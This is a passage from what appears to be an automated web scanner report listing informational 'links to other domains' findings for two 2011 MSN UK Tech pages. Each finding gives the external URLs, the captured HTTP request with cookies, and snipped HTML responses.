Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/media/articles.aspx?cp-documentid=154239335&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/media/articles.aspx?cp-documentid=154239335&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <li class="first"> <a href="http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104"> Classic Mobiles</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Laptops&form=MSN104"> Cheap laptops</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/search?q=mobile+broadband&form=MSN104"> Mobile broadband</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Digital+camera&form=MSN104"> Digital cameras</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104"> Top Mobile Phones</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=HD+Television&form=MSN104"> HD television</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/search?q=windows+phone+7&form=MSN104"> Windows Phone 7</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Buy+Xbox+360+slim&form=MSN104"> New Xbox 360</a>...[SNIP]... <li class="bottom llcb"> <a href="http://www.bing.com/search?q=internet+explorer+9&form=MSN104"> Internet Explorer 9</a>...[SNIP]... <li class="last bottom llfn"> <a href="http://www.bing.com/search?q=iphone&form=MSN104"> Iphone 4</a>...[SNIP]... <li class="first"><a href="http://mail.live.com/"> <img src="http://estb.msn.com/i/1A/36792ABEDFD48A5128CAB18793C4C.jpg" width="40" height="40" alt="Hotmail" /></a><a href="http://mail.live.com/"> Hotmail</a>...[SNIP]... <li><a href="http://imagine-msn.com/messenger/launch/en-GB/?thisTour=acquisition"> <img src="http://estb.msn.com/i/22/1646DF5A9878FF4EF730FE65AA1.jpg" width="40" height="40" alt="Messenger" /></a><a href="http://imagine-msn.com/messenger/launch/en-GB/?thisTour=acquisition"> Messenger</a>...[SNIP]... <li><a href="http://skydrive.live.com/"> <img src="http://estb.msn.com/i/35/B61CCAD3C93547C6B576F4875583C.jpg" width="40" height="40" alt="SkyDrive" /></a><a href="http://skydrive.live.com/"> SkyDrive</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com/"> <img src="http://estb.msn.com/i/E0/2220E96FB6ACABC4EDDE97D16A1E7.jpg" width="40" height="40" alt="Mobile" /></a><a href="http://www.messengergonemobile.com/"> Mobile</a>...[SNIP]... <li class="last"><a href="http://photos.live.com/"> <img src="http://estb.msn.com/i/D8/7AF966FED7743AB91FF3DE38616BB.jpg" width="40" height="40" alt="Photos" /></a><a href="http://photos.live.com/"> Photos</a>...[SNIP]... <li><a href="http://www.twitter.com/msntechnik"> <img src="http://estb.msn.com/i/A0/73EE55691874B316843CF17518A313.jpg" width="135" height="81" alt="Nik Taylor (MSN)" /></a><a href="http://www.twitter.com/msntechnik"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/msnuktech"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/msnuktech"> <strong>...[SNIP]... <li><a href="http://www.twitter.com/MSNTechVerity"> <img src="http://estb.msn.com/i/70/46399762CCCE49B80C97A5539134.jpg" width="135" height="81" alt="Verity Burns (MSN)" /></a><a href="http://www.twitter.com/MSNTechVerity"> <strong>...[SNIP]... <li class=" cb"><a href="http://twitter.com/msntech"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @msntech on Twitter (Twitter)" /></a><a href="http://twitter.com/msntech"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
2.7. http://tech.uk.msn.com/media/articles.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/media/articles.aspx
Issue detail
The page was loaded from a URL containing a query string:http://tech.uk.msn.com/media/articles.aspx?cp-documentid=154239335 The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://go.microsoft.com/fwlink/?LinkId=74170 http://imagine-msn.com/messenger/launch/en-GB/?thisTour=acquisition http://mail.live.com/ http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://photos.live.com/ http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://skydrive.live.com/ http://twitter.com/msntech http://twitter.com/share http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104 http://www.bing.com/maps/ http://www.bing.com/search?q=Buy+Xbox+360+slim&form=MSN104 http://www.bing.com/search?q=Digital+camera&form=MSN104 http://www.bing.com/search?q=HD+Television&form=MSN104 http://www.bing.com/search?q=Laptops&form=MSN104 http://www.bing.com/search?q=internet+explorer+9&form=MSN104 http://www.bing.com/search?q=iphone&form=MSN104 http://www.bing.com/search?q=mobile+broadband&form=MSN104 http://www.bing.com/search?q=windows+phone+7&form=MSN104 http://www.facebook.com/msnuktech http://www.messengergonemobile.com/ http://www.twitter.com/MSNTechVerity http://www.twitter.com/msntechnik http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376412&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fmedia%2Farticles.aspx%3Fcp-documentid%3D154239335&lc=2057&id=1184
Request
GET /media/articles.aspx?cp-documentid=154239335 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/media/articles.aspx?cp-documentid=154239335 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/features/%2526oid%253Dhttp%25253A//tech.uk.msn.com/features/photos.aspx%25253Fcp-documentid%25253D158635065%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA32 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:12 GMT ntCoent-Length: 53330 Content-Length: 53330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376412&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fmedia%2Farticles.aspx%3Fcp-documentid%3D154239335&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/media/articles.aspx?cp-documentid=154239335&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/media/articles.aspx?cp-documentid=154239335&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <li class="first"> <a href="http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104"> Classic Mobiles</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Laptops&form=MSN104"> Cheap laptops</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/search?q=mobile+broadband&form=MSN104"> Mobile broadband</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Digital+camera&form=MSN104"> Digital cameras</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104"> Top Mobile Phones</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=HD+Television&form=MSN104"> HD television</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/search?q=windows+phone+7&form=MSN104"> Windows Phone 7</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Buy+Xbox+360+slim&form=MSN104"> New Xbox 360</a>...[SNIP]... <li class="bottom llcb"> <a href="http://www.bing.com/search?q=internet+explorer+9&form=MSN104"> Internet Explorer 9</a>...[SNIP]... <li class="last bottom llfn"> <a href="http://www.bing.com/search?q=iphone&form=MSN104"> Iphone 4</a>...[SNIP]... <li class="first"><a href="http://mail.live.com/"> <img src="http://estb.msn.com/i/1A/36792ABEDFD48A5128CAB18793C4C.jpg" width="40" height="40" alt="Hotmail" /></a><a href="http://mail.live.com/"> Hotmail</a>...[SNIP]... <li><a href="http://imagine-msn.com/messenger/launch/en-GB/?thisTour=acquisition"> <img src="http://estb.msn.com/i/22/1646DF5A9878FF4EF730FE65AA1.jpg" width="40" height="40" alt="Messenger" /></a><a href="http://imagine-msn.com/messenger/launch/en-GB/?thisTour=acquisition"> Messenger</a>...[SNIP]... <li><a href="http://skydrive.live.com/"> <img src="http://estb.msn.com/i/35/B61CCAD3C93547C6B576F4875583C.jpg" width="40" height="40" alt="SkyDrive" /></a><a href="http://skydrive.live.com/"> SkyDrive</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com/"> <img src="http://estb.msn.com/i/E0/2220E96FB6ACABC4EDDE97D16A1E7.jpg" width="40" height="40" alt="Mobile" /></a><a href="http://www.messengergonemobile.com/"> Mobile</a>...[SNIP]... <li class="last"><a href="http://photos.live.com/"> <img src="http://estb.msn.com/i/D8/7AF966FED7743AB91FF3DE38616BB.jpg" width="40" height="40" alt="Photos" /></a><a href="http://photos.live.com/"> Photos</a>...[SNIP]... <li><a href="http://www.twitter.com/msntechnik"> <img src="http://estb.msn.com/i/A0/73EE55691874B316843CF17518A313.jpg" width="135" height="81" alt="Nik Taylor (MSN)" /></a><a href="http://www.twitter.com/msntechnik"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/msnuktech"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/msnuktech"> <strong>...[SNIP]... <li><a href="http://www.twitter.com/MSNTechVerity"> <img src="http://estb.msn.com/i/70/46399762CCCE49B80C97A5539134.jpg" width="135" height="81" alt="Verity Burns (MSN)" /></a><a href="http://www.twitter.com/MSNTechVerity"> <strong>...[SNIP]... <li class=" cb"><a href="http://twitter.com/msntech"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @msntech on Twitter (Twitter)" /></a><a href="http://twitter.com/msntech"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
2.8. http://tech.uk.msn.com/microsoft/photos.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/photos.aspx
Issue detail
The page was loaded from a URL containing a query string:http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://cid-173f68e1861ab75e.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://cid-272a9618db5e76f7.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://cid-6a467760f2b80189.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://cid-7b3b72cc82d94835.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://cid-edd15d6c58b72d56.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://del.icio.us/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://digg.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 http://eu.social.s-msn.com/s/images/bluemannxl.png http://eu.social.s-msn.com/s/images/emoticons/sad_smile.gif http://eu.social.s-msn.com/s/images/emoticons/shades_smile.gif http://eu.social.s-msn.com/s/images/emoticons/teeth_smile.gif http://go.microsoft.com/fwlink/?LinkId=74170 http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc http://mail.live.com/ http://mail.live.com/?mkt=en-gb http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaldev.112.2o7.net/b/ss/msnportaldev/1/H.1--NS/0 http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://spaces.live.com/blogit.aspx?title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&sourceurl=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&description=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam. http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 http://twitter.com/share http://twitter.com/winlivematt http://www.bing.com/maps/ http://www.bing.com/search?q=Anonymous+deny+PSN+theft&form=TECHTI http://www.bing.com/search?q=Creative+Zen+M300+PMP+iPod+Nano+rival&form=TECHTI http://www.bing.com/search?q=Facebook+to+buy+skype&form=TECHTI http://www.bing.com/search?q=iPad+3+to+be+3D%3F&form=TECHTI http://www.bing.com/search?q=paper+thin+smart+phone&form=TECHTI http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://www.facebook.com/windowslivechannel http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&labels=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam. http://www.messengergonemobile.com/ http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&c=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam. http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&h=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://www.reddit.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://www.technorati.com/faves?add=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376466&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fmicrosoft%2Fphotos.aspx%3Fcp-documentid%3D157623778&lc=2057&id=1184
Request
GET /microsoft/photos.aspx?cp-documentid=157623778 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/microsoft/hotmail/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/microsoft/hotmail/%2526oid%253Dhttp%25253A//tech.uk.msn.com/microsoft/photos.aspx%25253Fcp-documentid%25253D157623778%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA29 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:01:06 GMT ntCoent-Length: 144162 Content-Length: 144162 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376466&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fmicrosoft%2Fphotos.aspx%3Fcp-documentid%3D157623778&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/search?q=Anonymous+deny+PSN+theft&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> Anonymous denies PlayStation credit card theft</a>...[SNIP]... <li><a href="http://www.bing.com/search?q=Creative+Zen+M300+PMP+iPod+Nano+rival&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> Creative Zen release iPod Nano rival</a>...[SNIP]... <li><a href="http://www.bing.com/search?q=Facebook+to+buy+skype&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> Facebook in talks to buy Skype?</a>...[SNIP]... <li><a href="http://www.bing.com/search?q=paper+thin+smart+phone&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> Paper thin smart phone developed</a>...[SNIP]... <li class="last"><a href="http://www.bing.com/search?q=iPad+3+to+be+3D%3F&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> iPad 3 to be 3D?</a>...[SNIP]... <cite><a href="http://twitter.com/winlivematt"> Matt Farrington-Smith, </a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <p>The good news for those of you using <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://mail.live.com/?mkt=en-gb"> Hotmail</a>, is you're more protected than most, thanks to something called SmartScreen. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://mail.live.com/?mkt=en-gb"> Hotmail</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <li class="first jspopup"><a href="http://del.icio.us/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Del.icio.us" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/53/B85B6DFFC77EF9D86D931DDD3BDEC2.gif" width="16" height="16" alt="Share this page on Del.icio.us" />...[SNIP]... <li class=" jspopup"><a href="http://digg.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778" title="Share this page on Digg" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/28/77813148B142EF4F4DCEE7372FC215.jpg" width="16" height="16" alt="Share this page on Digg" />...[SNIP]... <li class=" jspopup"><a 